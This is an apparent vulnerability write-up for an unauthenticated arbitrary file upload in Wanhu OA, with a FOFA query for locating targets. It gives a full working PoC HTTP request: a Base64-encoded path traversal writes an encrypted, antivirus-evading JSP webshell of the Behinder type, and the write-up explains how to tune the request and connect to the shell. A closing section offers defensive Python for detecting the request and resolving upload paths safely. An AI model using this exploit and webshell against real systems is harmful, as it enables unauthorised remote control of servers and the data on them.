Wanhu OA (万户OA) file upload vulnerability
Vulnerability description
Wanhu OA has an unauthenticated arbitrary file upload vulnerability in the front end that can lead to getshell (a webshell being written to the server).
Affected products
Wanhu OA
FOFA query
"ezoffice"
Reproduction
Vulnerable URL:
/defaultroot/officeserverservlet
If the response highlighted in red is returned, the target is vulnerable.
PoC:
Header section
POST /defaultroot/officeserverservlet HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 10.10.16.18
Cookie: LocLan=zh_CN; JSESSIONID=7TRdgpNWj1Q480cly1VpQSHyKSPF4ttLQY7mtgd6VWdvWhRq21Ts!-879356732
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1183
Body section
DBSTEP V3.0 170 0 949 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Li4vLi4vOC5qc3A=
1111111111111111111111111111111111111111111111
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
%><%
Cipher c = Cipher.getInstance("AES");
if (session.getValue("u") == null) {
session.putValue("u", "2c627233c52031e4");
}
c.init(2, new SecretKeySpec((session.getValue("u") + "").getBytes(), "AES"));
String con = request.getReader().readLine();
if (con == null)return;
try {
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(con))).getConstructor(ServletRequest.class,ServletResponse.class).newInstance(request,response);
}catch (Exception e)
{
}
%>
The first line of the body above has to be customized.
949 is the length, in characters, of the file content that gets written; it has to be adjusted until it matches the length of the webshell. Alternatively, use the AV-evading Behinder (冰蝎) shell defined in the PoC as is.
In the request, the field FILETYPE=Li4vLi4vOC5qc3A=
Base64-decodes to ../../8.jsp, which is the upload path. It can be changed, but after changing it the 949 value has to be re-matched; it can also be left unchanged. The default path the webshell is written to is
The AV-evading shell has to be connected to with a modified Behinder client, or swapped for a Godzilla (哥斯拉) webshell.
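Added example for defenders (not part of the original write-up and not Wanhu's code): a small Python parser for the DBSTEP envelope shown in the PoC body, the kind of thing a WAF rule or log-review script would run over requests to /defaultroot/officeserverservlet. It Base64-decodes the key=value fields, then flags a SAVEFILE whose FILETYPE contains a ".." segment or a server-side script extension, or whose payload carries a JSP tag. A hardened path-resolution routine is included to show what the server should do instead of trusting FILETYPE. The malicious sample reuses the field values from the PoC; the benign sample, the allow-listed extensions and the base directory are constructed assumptions.

```python
import base64
import binascii
import posixpath
import re

# Constructed sample: the DBSTEP envelope fields from the PoC body in the write-up
# (header line, Base64 key=value fields, then the uploaded file content).
SAMPLE_MALICIOUS = (
    "DBSTEP V3.0 170 0 949 DBSTEP=REJTVEVQ\n"
    "OPTION=U0FWRUZJTEU=\n"
    "RECORDID=\n"
    "isDoc=dHJ1ZQ==\n"
    "moduleType=Z292ZG9jdW1lbnQ=\n"
    "FILETYPE=Li4vLi4vOC5qc3A=\n"
    "<%@page import=\"java.util.*\" %>\n"
)

# Constructed benign sample: an ordinary document save with a .doc target.
# The values are assumptions about a normal client, not captured from the product.
SAMPLE_BENIGN = (
    "DBSTEP V3.0 170 0 12 DBSTEP=REJTVEVQ\n"
    "OPTION=U0FWRUZJTEU=\n"
    "RECORDID=MTIz\n"            # "123"
    "isDoc=dHJ1ZQ==\n"
    "moduleType=Z292ZG9jdW1lbnQ=\n"
    "FILETYPE=ZG9j\n"            # "doc"
    "hello world\n"
)

FIELD_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=([A-Za-z0-9+/=]*)$")
SCRIPT_EXTS = (".jsp", ".jspx", ".jspf", ".jsw", ".jsv")
ALLOWED_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".pdf")  # assumed allow-list


def decode_field(value):
    """Base64-decode one DBSTEP field value; '' stays ''; None if not valid Base64."""
    if value == "":
        return ""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def parse_dbstep(body):
    """Split a DBSTEP body into (header_line, decoded_fields, payload)."""
    lines = body.split("\n")
    header = lines[0] if lines else ""
    fields = {}
    idx = 1
    for idx in range(1, len(lines)):
        m = FIELD_RE.match(lines[idx])
        if not m:
            break                      # first non key=value line starts the payload
        fields[m.group(1)] = decode_field(m.group(2))
    else:
        idx = len(lines)               # every line was a field: no payload
    return header, fields, "\n".join(lines[idx:])


def inspect_upload(body):
    """Return findings for a SAVEFILE request; an empty list means nothing suspicious."""
    _header, fields, payload = parse_dbstep(body)
    findings = []
    if fields.get("OPTION") != "SAVEFILE":
        return findings                # only file-save operations are of interest
    target = fields.get("FILETYPE") or ""
    segments = target.replace("\\", "/").split("/")
    if ".." in segments:
        findings.append("path traversal in FILETYPE: %r" % target)
    if target.lower().endswith(SCRIPT_EXTS):
        findings.append("server-side script extension in FILETYPE: %r" % target)
    if "<%" in payload:
        findings.append("JSP directive/scriptlet tag in uploaded content")
    return findings


def resolve_upload_path(base_dir, requested):
    """Hardened counterpart: accept only a bare file name with an allow-listed
    extension that stays inside base_dir after normalization; None otherwise."""
    name = requested.replace("\\", "/")
    if "/" in name or name in ("", ".", ".."):
        return None
    if not name.lower().endswith(ALLOWED_EXTS):
        return None
    full = posixpath.normpath(posixpath.join(base_dir, name))
    if not full.startswith(posixpath.normpath(base_dir) + "/"):
        return None
    return full


if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, parse_dbstep(sample)[1], inspect_upload(sample))
    print(resolve_upload_path("/srv/oa/upload", "../../8.jsp"))
    print(resolve_upload_path("/srv/oa/upload", "report.doc"))
```

The detection side is deliberately field-aware rather than a raw string match: the dangerous values in this request are Base64-encoded, so a signature on "../" or ".jsp" in the raw body would miss them. The resolve_upload_path routine shows the fix on the server side: the client-supplied name is reduced to a bare file name, checked against an extension allow-list, and the normalized result is verified to still sit under the upload directory.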